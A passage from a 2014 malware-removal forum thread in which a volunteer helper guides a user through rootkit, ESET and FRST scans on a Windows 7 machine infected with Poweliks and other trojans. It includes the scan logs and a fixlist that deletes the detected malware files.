09:21:48.0183 0x0304  [ 8C338238C16777A802D6A9211EB2BA50, 0D08A47CD403EDA5E8CAD7409BBBBCDC29A9861D2DC41D42B68B22B1AA1EBDD6 ] netprofm        C:\Windows\System32\netprofm.dll
09:21:48.0183 0x0304  netprofm - ok
09:21:48.0229 0x0304  [ 652881F65B35564575255A0E05E23C55, 6F77B2BD9362D7593B5B2A8AEAE834463CB32B006ABE2188A5A36C9469896960 ] netr28          C:\Windows\system32\DRIVERS\netr28.sys
09:21:48.0245 0x0304  netr28 - ok
09:21:48.0283 0x0304  [ 21318671BCAD3ACF16638F98D4D00973, CEA6E3B6BCB4B74A9ACACBEEA12EEA967BBC2240398E2EBC04D7910109CACA11 ] NetTcpActivator C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe
09:21:48.0283 0x0304  NetTcpActivator - ok
09:21:48.0283 0x0304  [ 21318671BCAD3ACF16638F98D4D00973, CEA6E3B6BCB4B74A9ACACBEEA12EEA967BBC2240398E2EBC04D7910109CACA11 ] NetTcpPortSharing C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe
09:21:48.0283 0x0304  NetTcpPortSharing - ok
09:21:48.0314 0x0304  [ 1D85C4B390B0EE09C7A46B91EFB2C097, 6A8850B151E88EE371F3CC543A946302DDF9494908D684B8B0C706A42CC54348 ] nfrd960         C:\Windows\system32\DRIVERS\nfrd960.sys
09:21:48.0314 0x0304  nfrd960 - ok
09:21:48.0361 0x0304  [ 374071043F9E4231EE43BE2BB48DD36D, C4FA3FC40CC49DBBB91901D14210A55D3831FAC9F9B3FF45FCA7F5CF242C9E92 ] NlaSvc          C:\Windows\System32\nlasvc.dll
09:21:48.0361 0x0304  NlaSvc - ok
09:21:48.0383 0x0304  [ 1DB262A9F8C087E8153D89BEF3D2235F, A51EE5D5AD3CD76B74BEA9C66C462608BF3B50C53DAA4110A75DB10495A8C101 ] Npfs            C:\Windows\system32\drivers\Npfs.sys
09:21:48.0383 0x0304  Npfs - ok
09:21:48.0398 0x0304  [ BA387E955E890C8A88306D9B8D06BF17, 3477BD9686C5777A93251C154512671AAA7533B18C536DF51F7B1D6D28E7F8A5 ] nsi             C:\Windows\system32\nsisvc.dll
09:21:48.0398 0x0304  nsi - ok
09:21:48.0414 0x0304  [ E9A0A4D07E53D8FEA2BB8387A3293C58, 690CAD6C4E35ECC1172A2E1FD3933DF73158B3BF42CB21244269612A53DE4D7A ] nsiproxy        C:\Windows\system32\drivers\nsiproxy.sys
09:21:48.0414 0x0304  nsiproxy - ok
09:21:48.0492 0x0304  [ C8DFF8D07755A66C7A4A738930F0FEAC, A2CC58312CE57988ABD976155BE91F558DCEC4C23481C6FBE64B361D511A36EA ] Ntfs            C:\Windows\system32\drivers\Ntfs.sys
09:21:48.0496 0x0304  Ntfs - ok
09:21:48.0543 0x0304  [ F9756A98D69098DCA8945D62858A812C, 572ADBFCFDE2030B34A013AADC14DBC144EB3F34D06991E2464A3EA9605BC045 ] Null            C:\Windows\system32\drivers\Null.sys
09:21:48.0543 0x0304  Null - ok
09:21:48.0583 0x0304  [ B3E25EE28883877076E0E1FF877D02E0, 402B6FED6FBBF645190396DC141141EF52DD059DABD01F8AC9CF01D23664070C ] nvraid          C:\Windows\system32\drivers\nvraid.sys
09:21:54.0690 0x0304  wcncsvc - ok
09:21:54.0706 0x0304  [ 5D930B6357A6D2AF4D7653BDABBF352F, 677FF2ED14EE0B0CAA710DA81556CC16D5971DAB10E7C7432D167A87CA6F0EAA ] WcsPlugInService C:\Windows\System32\WcsPlugInService.dll
09:21:54.0706 0x0304  WcsPlugInService - ok
09:21:54.0737 0x0304  [ 1112A9BADACB47B7C0BB0392E3158DFF, 1AE2AFA125973571F91E6945FE8A735F63D76EBB250A0075D98C580167FD9ED4 ] Wd              C:\Windows\system32\DRIVERS\wd.sys
09:21:54.0737 0x0304  Wd - ok
09:21:54.0798 0x0304  [ 25944D2CC49E0A6C581D02A74B7D6645, AF8FFAFEC07F1A6A3D4008E609E8E1D705A8DFCC7995C766E3946887203F7BEE ] Wdf01000        C:\Windows\system32\drivers\Wdf01000.sys
09:21:54.0798 0x0304  Wdf01000 - ok
09:21:54.0813 0x0304  [ 46EF9DC96265FD0B423DB72E7C38C2A5, 43801A51FB0E45CFFC73DF6441B54A75FC2FEAF5E0424DFE7AB04FC26CF6CD16 ] WdiServiceHost  C:\Windows\system32\wdi.dll
09:21:54.0829 0x0304  WdiServiceHost - ok
09:21:54.0829 0x0304  [ 46EF9DC96265FD0B423DB72E7C38C2A5, 43801A51FB0E45CFFC73DF6441B54A75FC2FEAF5E0424DFE7AB04FC26CF6CD16 ] WdiSystemHost   C:\Windows\system32\wdi.dll
09:21:54.0829 0x0304  WdiSystemHost - ok
09:21:54.0981 0x0304  [ 75E8EBD7040CE238684333F97014762A, 2CA0B267FBAEB303D1F8B639D733DC0DE17BA1276CC9096035B4F2BBBED3EF7F ] WebClient       C:\Windows\System32\webclnt.dll
09:21:54.0982 0x0304  WebClient - ok
09:21:55.0013 0x0304  [ 760F0AFE937A77CFF27153206534F275, A53940BA28854486FF18F16B98A3314B36322B0B6EFB54D08B921315BEB0ADD5 ] Wecsvc          C:\Windows\system32\wecsvc.dll
09:21:55.0013 0x0304  Wecsvc - ok
09:21:55.0045 0x0304  [ AC804569BB2364FB6017370258A4091B, 1856F354146A5946F3E7D0DD09726FC8A3502B0F0776FEADDF10669C81CC28E2 ] wercplsupport   C:\Windows\System32\wercplsupport.dll
09:21:55.0045 0x0304  wercplsupport - ok
09:21:55.0080 0x0304  [ 08E420D873E4FD85241EE2421B02C4A4, E1E9436EB096FF7DE9A76DA6217035257EF9FC7565DDB9016DCA3859E7F1EF0F ] WerSvc          C:\Windows\System32\WerSvc.dll
09:21:55.0083 0x0304  WerSvc - ok
09:21:55.0100 0x0304  [ 8B9A943F3B53861F2BFAF6C186168F79, 88E2F79F32AFBA17CB8377A508B83A1EC2315E9F3A365F591C87FE4525AA6713 ] WfpLwf          C:\Windows\system32\DRIVERS\wfplwf.sys
09:21:55.0100 0x0304  WfpLwf - ok
09:21:55.0116 0x0304  [ 5CF95B35E59E2A38023836FFF31BE64C, CEA21302B3E855EE592810D4E0DE10E47A47A393064C435463CD54598735CD8D ] WIMMount        C:\Windows\system32\drivers\wimmount.sys
09:21:55.0116 0x0304  WIMMount - ok
09:21:55.0353 0x0304  [ 082CF481F659FAE0DE51AD060881EB47, BB67D2AF0BB9192D4CCF66C23D80CE5A1B38715556D94E2561DBF8F805FA30A5 ] WinDefend       C:\Program Files\Windows Defender\mpsvc.dll
09:21:55.0371 0x0304  WinDefend - ok
09:21:55.0402 0x0304  WinHttpAutoProxySvc - ok
09:21:55.0451 0x0304  [ F62E510B6AD4C21EB9FE8668ED251826, FA3E5CAC3E67E49377320CFBE4646585E6B62168292768FEA81E4623F9166890 ] Winmgmt         C:\Windows\system32\wbem\WMIsvc.dll
09:21:55.0451 0x0304  Winmgmt - ok
09:21:55.0513 0x0304  [ 1B91CD34EA3A90AB6A4EF0550174F4CC, 5B6618615EBFBA594C945AD35F5C68DA8C6053892B6D12D626BB6120910D80DC ] WinRM           C:\Windows\system32\WsmSvc.dll
09:21:55.0529 0x0304  WinRM - ok
09:21:55.0713 0x0304  [ 16935C98FF639D185086A3529B1F2067, E9C6B73A572A04FCE9B1B0E6815F941B10332D9A6D55B92927C2B1275F119091 ] Wlansvc         C:\Windows\System32\wlansvc.dll
09:21:55.0729 0x0304  Wlansvc - ok
09:21:55.0918 0x0304  [ 5144AE67D60EC653F97DDF3FEED29E77, F6238767284B2356A9F502E2ACCFAAC283FA13CBF238E98B5115A55179526B10 ] wlidsvc         C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
09:21:55.0943 0x0304  wlidsvc - ok
09:21:56.0229 0x0304  [ 0217679B8FCA58714C3BF2726D2CA84E, 4494984B922DCF24D37BCD0E6831CEBD07D1CA49235D04E821D17ED3DF84ED2A ] WmiAcpi         C:\Windows\system32\drivers\wmiacpi.sys
09:21:56.0229 0x0304  WmiAcpi - ok
09:21:56.0279 0x0304  [ 6EB6B66517B048D87DC1856DDF1F4C3F, EBB534C4829477C70062ADBB5626236B02FE563A544C53FA255E79F3CA170FE8 ] wmiApSrv        C:\Windows\system32\wbem\WmiApSrv.exe
09:21:56.0281 0x0304  wmiApSrv - ok
09:21:56.0662 0x0304  [ 3B40D3A61AA8C21B88AE57C58AB3122E, 6C67DCB007C3CDF2EB0BBF5FD89C32CD7800C20F7166872F8C387BE262C5CD21 ] WMPNetworkSvc   C:\Program Files\Windows Media Player\wmpnetwk.exe
09:21:56.0682 0x0304  WMPNetworkSvc - ok
09:21:56.0698 0x0304  [ A2F0EC770A92F2B3F9DE6D518E11409C, 6838F2148B11285E00DC449D51F8AD85AAE57694E89BA2C607B87AC1C650D845 ] WPCSvc          C:\Windows\System32\wpcsvc.dll
09:21:56.0698 0x0304  WPCSvc - ok
09:21:56.0745 0x0304  [ AA53356D60AF47EACC85BC617A4F3F66, 155CB8112AA382D841C1891750FF29EF4F1BF716CD9CDF0F2243209E2CCCAC98 ] WPDBusEnum      C:\Windows\system32\wpdbusenum.dll
09:21:56.0745 0x0304  WPDBusEnum - ok
09:21:56.0798 0x0304  [ 6DB3276587B853BF886B69528FDB048C, 9972FF6DF0DF6F86D1E9BCEF4C29064748B217DA196B0633C30D3D580144951C ] ws2ifsl         C:\Windows\system32\drivers\ws2ifsl.sys
09:21:56.0798 0x0304  ws2ifsl - ok
09:21:56.0829 0x0304  [ 6F5D49EFE0E7164E03AE773A3FE25340, 15B6AFF7455538189A96F8863CC995A271E02C6FBDAC15B037D44DDA65E61339 ] wscsvc          C:\Windows\system32\wscsvc.dll
09:21:56.0844 0x0304  wscsvc - ok
09:21:56.0944 0x0304  [ 553F6CCD7C58EB98D4A8FBDAF283D7A9, 71FBE50C470D1F54FDAADCECEC2CB021AE240CD59DE4E8EB5BCAA6E7F2F86560 ] WSDPrintDevice  C:\Windows\system32\DRIVERS\WSDPrint.sys
09:21:56.0944 0x0304  WSDPrintDevice - ok
09:21:56.0999 0x0304  [ 7DC0270CFD4A05B4112E3EBBF083B595, DF4FCDE511F0B68B6C6E28C820EB722C34710F31A16023A9A297EAD228E00137 ] WSDScan         C:\Windows\system32\drivers\WSDScan.sys
09:21:56.0999 0x0304  WSDScan - ok
09:21:57.0014 0x0304  WSearch - ok
09:21:57.0144 0x0304  [ D9B0134913E5EF007AF82A418C503322, 7418DD28C8E968674382F8352AAFFC4DE77887E2B71B8844D615F19432B4C55A ] wuauserv        C:\Windows\system32\wuaueng.dll
09:21:57.0175 0x0304  wuauserv - ok
09:21:57.0216 0x0304  [ 06E6F32C8D0A3F66D956F57B43A2E070, 9A6BD96A28294B0372F16E13D652FD603308F64B74A56E41E0C68C5E8011F943 ] WudfPf          C:\Windows\system32\drivers\WudfPf.sys
09:21:57.0216 0x0304  WudfPf - ok
09:21:57.0247 0x0304  [ 867C301E8B790040AE9CF6486E8041DF, D867D6498C987944D99508B2FAD6D6B749FA1EDFE8124B0863D4A642352F0855 ] WUDFRd          C:\Windows\system32\DRIVERS\WUDFRd.sys
09:21:57.0247 0x0304  WUDFRd - ok
09:21:57.0299 0x0304  [ FE47B7BC8EA320C2D9B5E5BF6E303765, 34518DBD1E9EA6E5DA62273B18613761E1D9C6B4E074A93C6D639FBAF02222EA ] wudfsvc         C:\Windows\System32\WUDFSvc.dll
09:21:57.0300 0x0304  wudfsvc - ok
09:21:57.0347 0x0304  [ 7CC38741B8F68F1E0D5D79DA6123666A, F90D2DA1C9AFB506C381CD386E1430931B5F81813FEDFD720F87FBC54E7A00DA ] WwanSvc         C:\Windows\System32\wwansvc.dll
09:21:57.0347 0x0304  WwanSvc - ok
09:21:57.0363 0x0304  ================ Scan global ===============================
09:21:57.0399 0x0304  [ DAB748AE0439955ED2FA22357533DDDB, 73EDD402C7479DDCE1998D0C7E99E1EC2974F64EFC33A851439CC85D09EDCDF9 ] C:\Windows\system32\basesrv.dll
09:21:57.0450 0x0304  [ 51BB04243DF6196C06E125898127E397, E1B6C83FC6E455F6806185027C5B56F8BA9ECDF1CD69E97301EC0291F0D3466E ] C:\Windows\system32\winsrv.dll
09:21:57.0490 0x0304  [ 51BB04243DF6196C06E125898127E397, E1B6C83FC6E455F6806185027C5B56F8BA9ECDF1CD69E97301EC0291F0D3466E ] C:\Windows\system32\winsrv.dll
09:21:57.0518 0x0304  [ 364455805E64882844EE9ACB72522830, 906561DBBB33F744844CF27E456226044C85DF0FCFD26DE1FD11E09E2CFA6F8F ] C:\Windows\system32\sxssrv.dll
09:21:57.0549 0x0304  [ 5F1B6A9C35D3D5CA72D6D6FDEF9747D6, D7BC4ED605B32274B45328FD9914FB0E7B90D869A38F0E6F94FB1BF4E9E2B407 ] C:\Windows\system32\services.exe
09:21:57.0549 0x0304  [ Global ] - ok
09:21:57.0549 0x0304  ================ Scan MBR ==================================
09:21:57.0567 0x0304  [ A36C5E4F47E84449FF07ED3517B43A31 ] \Device\Harddisk0\DR0
09:21:59.0182 0x0304  \Device\Harddisk0\DR0 - ok
09:21:59.0182 0x0304  ================ Scan VBR ==================================
09:21:59.0282 0x0304  [ D9A75FBEF39E92189FCB8961791DE7C7 ] \Device\Harddisk0\DR0\Partition1
09:21:59.0282 0x0304  \Device\Harddisk0\DR0\Partition1 - ok
09:21:59.0313 0x0304  [ C255B923CA073ED4958E953C408EFA53 ] \Device\Harddisk0\DR0\Partition2
09:21:59.0313 0x0304  \Device\Harddisk0\DR0\Partition2 - ok
09:21:59.0693 0x0304  [ 66CD029C494AF0D035725BFB53E000EA ] \Device\Harddisk0\DR0\Partition3
09:21:59.0698 0x0304  \Device\Harddisk0\DR0\Partition3 - ok
09:21:59.0700 0x0304  ================ Scan generic autorun ======================
09:21:59.0982 0x0304  [ 8C48FEDC3FAA7F14C72557D49DC4FDF6, 51DA51F18348C42702DD1D1CFA149D6E1173FC77A8F5D43C9DC9A305FF6EBFC6 ] C:\Program Files\Realtek\Audio\HDA\RtHDVCpl.exe
09:22:00.0197 0x0304  RtHDVCpl - ok
09:22:00.0497 0x0304  [ 1E69319B2F7C46070DC8E6BAF0941FE2, 709FF756E6A09857F1C84F384903C6A64B36D2702F1568E404D97CE2649F6D74 ] C:\Program Files\Common Files\Intel\Privacy Icon\PrivacyIconClient.exe
09:22:00.0513 0x0304  picon - ok
09:22:00.0560 0x0304  [ 56695FAD23373AFCF3CB6D9C2B529337, E13DD9A405EA2193D91959AB848A3C6255091DC151158256C9DC54F17654D1FA ] C:\Program Files\PDF Complete\pdfsty.exe
09:22:00.0578 0x0304  PDF Complete - ok
09:22:00.0615 0x0304  [ 8A7F55E5B5543C95D8AF191BCBF6D125, 6DE8F960AEF4D953804CF9FFE813392BF7A3AFF798829B5D325204883CBD49A8 ] C:\Program Files\Microsoft\Search Enhancement Pack\Default Manager\DefMgr.exe
09:22:00.0630 0x0304  Microsoft Default Manager - ok
09:22:00.0959 0x0304  [ A0F17425047BE16181075F80E3285E97, C19685FC14146728FDD83728485375C5F5E1843A61BE9584B3DFDA16561D0616 ] C:\Program Files\McAfee\Managed VirusScan\Agent\Splash.exe
09:22:00.0982 0x0304  MVS Splash - ok
09:22:00.0998 0x0304  [ BAE17CAD1AB90549AE6D685435BF9D0A, 80B3ED37DD8DC2078A150B757C8B4C6F48E7B941B94FC57CB147D4CB74D66097 ] C:\Program Files\McAfee\Managed VirusScan\Agent\StartMyAgtTry.Exe
09:22:01.0013 0x0304  McAfee Managed Services Tray - ok
09:22:01.0029 0x0304  [ 2562EA6C84097C2529C4E0D1ABE6A2FB, A45E8EA519F69B10C9D6B81D4C2D87A2891C71F05719753FB6D32E08AC2DB02C ] C:\Program Files\SiteAdvisor\6173\SiteAdv.exe
09:22:01.0029 0x0304  SiteAdvisor - ok
09:22:01.0060 0x0304  [ 1029B84ECBE4B95ACB8491A3FE63D70F, DF765BEE2B20800646F70B9E473B95F52457316CB331A3E0BF6974D827AB989D ] C:\Windows\system32\igfxtray.exe
09:22:01.0060 0x0304  IgfxTray - ok
09:22:01.0082 0x0304  [ 3CD5BBDA19A1AB4EBA359E0A14FDF0F0, 992E7322C86DA533F6DB9192427EBDC5A8F4D1A878F4B30A17ABD54656CFF6C1 ] C:\Windows\system32\hkcmd.exe
09:22:01.0082 0x0304  HotKeysCmds - ok
09:22:01.0097 0x0304  [ 3142195521FEE436088EE8A5748DE1B1, EE8E65977AA0EAC0BF48F7C4620946E48679F047EFC515D5F2E52EA4B88C5731 ] C:\Windows\system32\igfxpers.exe
09:22:01.0113 0x0304  Persistence - ok
09:22:01.0323 0x0304  [ 048EA4B978851788E9F5E8E4F081DF7A, EB62719AC0DCC18FF056F2CD84438BF14B61E38F0619617C81961C6257BDFCEC ] C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe
09:22:01.0354 0x0304  Adobe ARM - ok
09:22:01.0483 0x0304  [ DD79A6B15C2F28DE98DF4852AAF6B13B, 0F7E9023E0BA4B40E2DE9A9FA34E85FEAF72B93049AAB3E1D73AD046BB113E05 ] C:\Program Files\Hewlett-Packard\HP Health Check\ActiveCheck\product_line\NCPluginUpdater.exe
09:22:01.0483 0x0304  NCPluginUpdater - ok
09:22:01.0514 0x0304  [ 5D61BE7DB55B026A5D61A3EED09D0EAD, D32CC7B31A6F98C60ABC313ABC7D1143681F72DE2BB2604711A0BA20710CAAAE ] C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe
09:22:01.0514 0x0304  swg - ok
09:22:01.0514 0x0304  Waiting for KSN requests completion. In queue: 43
09:22:02.0529 0x0304  Waiting for KSN requests completion. In queue: 43
09:22:03.0529 0x0304  Waiting for KSN requests completion. In queue: 13
09:22:04.0545 0x0304  AV detected via SS2: McAfee® Total Protection™ for Small Business,  (  ), 0x40010 ( disabled : outofdate )
09:22:04.0545 0x0304  Win FW state via NFP2: enabled
09:22:07.0342 0x0304  ============================================================
09:22:07.0342 0x0304  Scan finished
09:22:07.0342 0x0304  ============================================================
09:22:07.0342 0x02b8  Detected object count: 0
09:22:07.0342 0x02b8  Actual detected object count: 0
09:22:10.0883 0x09d0  Deinitialize success
 


#7 deeprybka


Posted 30 October 2014 - 01:21 PM

Let's do a final check up:

Step 1


Please download ESET Online Scanner and save it to your Desktop.
  • Disable the realtime-protection of your antivirus and anti-malware programs because they might interfere with the scan.
  • Start the installer with administrator privileges.
  • Select the option Yes, I accept the Terms of Use and click on Start.
  • Choose the following settings: [image: settings.png]
  • Click on Start. The virus signature database will begin to download. This may take some time.
  • When completed the Online Scan will begin automatically.
    Note: This scan might take a long time! Please be patient.
  • When completed select Uninstall application on close if you so wish, but make sure you copy the logfile first!
  • Now click on Finish
  • A log file is created at [image: logpath.png]
    Copy and paste the content of this log file in your next reply.
Note: Do not forget to re-enable your antivirus application after running the above scan!

Can you please tell me which problems still persist now?
How is the computer running now?

Edited by deeprybka, 30 October 2014 - 01:23 PM.

regards,
deeprybka

#8 deeprybka


Posted 02 November 2014 - 10:38 AM

Hi,

3 Day Inactivity

This is the third day since my last post. Are you still there?

If you need more time, just let me know.

If you do not post within 48 hours, this thread will be closed due to inactivity.
regards,
deeprybka

#9 ScotDesort


Posted 03 November 2014 - 10:54 AM

Thank you for the follow-up. I am unable to get to my client's computer until tomorrow.



#10 deeprybka


Posted 03 November 2014 - 03:21 PM

OK... :)

 

Thanks for letting me know


regards,
deeprybka

#11 ScotDesort


Posted 04 November 2014 - 10:30 AM

ESET Log:

 

ESETSmartInstaller@High as downloader log:
all ok
# product=EOS
# version=8
# OnlineScannerApp.exe=1.0.0.1
# OnlineScanner.ocx=1.0.0.7623
# api_version=3.0.2
# EOSSerial=1800e91f713fa7459d38b5b5bc230ddb
# engine=20912
# end=finished
# remove_checked=false
# archives_checked=true
# unwanted_checked=true
# unsafe_checked=true
# antistealth_checked=true
# utc_time=2014-11-03 10:44:31
# local_time=2014-11-03 05:44:31 (-0500, Eastern Standard Time)
# country="United States"
# lang=1033
# osver=6.1.7601 NT Service Pack 1
# compatibility_mode_1=''
# compatibility_mode=5893 16776573 100 94 0 166599462 0 0
# scanned=158905
# found=4
# cleaned=0
# scan_time=2495
sh=22012649AA10CDAD79D212BBB84379D8D89FA494 ft=1 fh=b57fdac6a7ca6449 vn="a variant of Win32/Kryptik.COSZ trojan" ac=I fn="C:\FRST\Quarantine\C\ProgramData\{D9E629DC-CB1C-4A97-9900-81922B4EFFD4}\thawbrkr.dll"
sh=612670E7D9FDF830F306B1A6E66B8BC394C7BE20 ft=0 fh=0000000000000000 vn="Win32/Poweliks.C trojan" ac=I fn="C:\Qoobox\Quarantine\Registry_backups\CLSID_{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}.reg.dat"
sh=805B65B464690312D336B4997A506B635418F5E2 ft=1 fh=33b109c4cd90c0e7 vn="Win32/TrojanDownloader.Tracur.AM trojan" ac=I fn="C:\Users\KELI\AppData\LocalLow\jbtzpjy.dll"
sh=58B0F131807508594519FCEA1431D65707FEBA6A ft=1 fh=dd93094cda03343e vn="a variant of Win32/Kryptik.CLAE trojan" ac=I fn="C:\Users\KELI\AppData\LocalLow\nsshxvi.dll"
 
 
Computer seems much better now, but I have left it disconnected from the internet most of the time until this is completely resolved. While connected to the internet, the effects of Poweliks do not seem to be happening any more.


#12 deeprybka


Posted 04 November 2014 - 11:13 AM

Hi,

please do the following:

Step 1

Press the Windows key + R on your keyboard at the same time. Type notepad and click OK.
  • Copy the entire content of the codebox below and paste into the notepad document:
    C:\Users\KELI\AppData\LocalLow\jbtzpjy.dll
    C:\Users\KELI\AppData\LocalLow\nsshxvi.dll
    EmptyTemp:
    
  • Click File, Save As and type fixlist.txt as the File Name.
Both files, FRST and fixlist.txt have to be in the same location or the fix will not work!
  • Right-click on the FRST icon and select Run as Administrator to start the tool.
    (XP users click run after receipt of Windows Security Warning - Open File).
  • Press the Fix button just once and wait.
  • If for some reason the tool needs a restart, please make sure you let the system restart normally. After that let the tool complete its run.
  • When finished FRST will generate a log on the Desktop, called Fixlog.txt.
Please post it to your reply.

After the Reboot:

Step 2

Start FRST with administrator privileges.
  • Make sure the following option is checked: [image: addition.png]
  • Press the Scan button.
  • When finished, FRST will produce two logs (FRST.txt and Addition.txt) in the same directory the tool was run from.
    Please copy and paste these logs in your next reply.

regards,
deeprybka

#13 ScotDesort


Posted 06 November 2014 - 08:47 AM

FRST.TXT:

 

Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 04-11-2014
Ran by KELI (administrator) on ATTY-2 on 06-11-2014 08:44:17
Running from C:\Users\KELI\Desktop
Loaded Profile: KELI (Available profiles: KELI)
Platform: Microsoft Windows 7 Professional  Service Pack 1 (X86) OS Language: English (United States)
Internet Explorer Version 11
Boot Mode: Normal
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(McAfee, Inc.) C:\Program Files\McAfee\Managed VirusScan\VScan\EngineServer.exe
(InterVideo) C:\Program Files\Common Files\InterVideo\RegMgr\iviRegMgr.exe
(Intel Corporation) C:\Program Files\Intel\AMT\LMS.exe
(PDF Complete Inc) C:\Program Files\PDF Complete\pdfsvc.exe
(Protexis Inc.) C:\Program Files\Common Files\Protexis\License Service\PsiService_2.exe
(Microsoft Corporation) C:\Program Files\Microsoft\Search Enhancement Pack\SeaPort\SeaPort.exe
() C:\Program Files\SiteAdvisor\6173\SAService.exe
(Intel Corporation) C:\Program Files\Common Files\Intel\Privacy Icon\UNS\UNS.exe
(Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\Windows Live\WLIDSVC.EXE
(Microsoft Corporation) C:\Windows\System32\PrintIsolationHost.exe
(Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\Windows Live\WLIDSVCM.EXE
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtHDVCpl.exe
(Intel Corporation) C:\Program Files\Common Files\Intel\Privacy Icon\PrivacyIconClient.exe
(McAfee, Inc.) C:\Program Files\McAfee\Managed VirusScan\Agent\StartMyAgtTry.exe
() C:\Program Files\SiteAdvisor\6173\SiteAdv.exe
(Intel Corporation) C:\Windows\System32\igfxtray.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Adobe Systems Incorporated) C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe
(KYOCERA MITA Corporation) C:\Program Files\Kyocera\FileUtility\NsCatCom.exe
(Dropbox, Inc.) C:\Users\KELI\AppData\Roaming\Dropbox\bin\Dropbox.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework\v3.0\WPF\PresentationFontCache.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
 
 
==================== Registry (Whitelisted) ==================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RtHDVCpl.exe [7596576 2009-07-02] (Realtek Semiconductor)
HKLM\...\Run: [picon] => C:\Program Files\Common Files\Intel\Privacy Icon\PrivacyIconClient.exe [796696 2009-07-24] (Intel Corporation)
HKLM\...\Run: [PDF Complete] => C:\Program Files\PDF Complete\pdfsty.exe [563736 2009-06-18] (PDF Complete Inc)
HKLM\...\Run: [Microsoft Default Manager] => C:\Program Files\Microsoft\Search Enhancement Pack\Default Manager\DefMgr.exe [439568 2010-05-10] (Microsoft Corporation)
HKLM\...\Run: [MVS Splash] => C:\Program Files\McAfee\Managed VirusScan\Agent\Splash.exe [562496 2009-11-17] (McAfee, Inc.)
HKLM\...\Run: [McAfee Managed Services Tray] => C:\Program Files\McAfee\Managed VirusScan\Agent\StartMyAgtTry.Exe [95552 2009-11-17] (McAfee, Inc.)
HKLM\...\Run: [SiteAdvisor] => C:\Program Files\SiteAdvisor\6173\SiteAdv.exe [36640 2007-08-28] ()
HKLM\...\Run: [Adobe ARM] => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959904 2013-11-21] (Adobe Systems Incorporated)
HKLM\...\RunOnce: [NCPluginUpdater] => C:\Program Files\Hewlett-Packard\HP Health Check\ActiveCheck\product_line\NCPluginUpdater.exe [21720 2014-10-21] (Hewlett-Packard)
HKU\S-1-5-21-3621039740-3434257137-3815352865-1001\...\Run: [swg] => C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe [39408 2011-03-21] (Google Inc.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Scanner File Utility.lnk
ShortcutTarget: Scanner File Utility.lnk -> C:\Program Files\Kyocera\FileUtility\NsCatCom.exe (KYOCERA MITA Corporation)
Startup: C:\Users\KELI\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dropbox.lnk
ShortcutTarget: Dropbox.lnk -> C:\Users\KELI\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://g.msn.com/HPCOM/1
HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
HKU\S-1-5-21-3621039740-3434257137-3815352865-1001\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
BHO: No Name -> {089FD14D-132B-48FC-8861-0048AE113215} -> C:\Program Files\SiteAdvisor\6173\SiteAdv.dll ()
BHO: Search Helper -> {6EBF7485-159F-4bff-A14F-B9E3AAC4465B} -> C:\Program Files\Microsoft\Search Enhancement Pack\Search Helper\SEPsearchhelperie.dll (Microsoft Corporation)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corporation)
BHO: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
BHO: Bing Bar BHO -> {d2ce3e00-f94a-4740-988e-03dc2f38c34f} -> C:\Program Files\MSN Toolbar\Platform\6.0.2237.0\npwinext.dll (Microsoft Corporation)
BHO: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll (Hewlett-Packard)
Toolbar: HKLM - @C:\Program Files\MSN Toolbar\Platform\6.0.2237.0\npwinext.dll,-100 - {8dcb7100-df86-4384-8842-8fa844297b3f} - C:\Program Files\MSN Toolbar\Platform\6.0.2237.0\npwinext.dll (Microsoft Corporation)
Toolbar: HKLM - McAfee SiteAdvisor - {0BF43445-2F28-4351-9252-17FE6E806AA0} - C:\Program Files\SiteAdvisor\6173\SiteAdv.dll ()
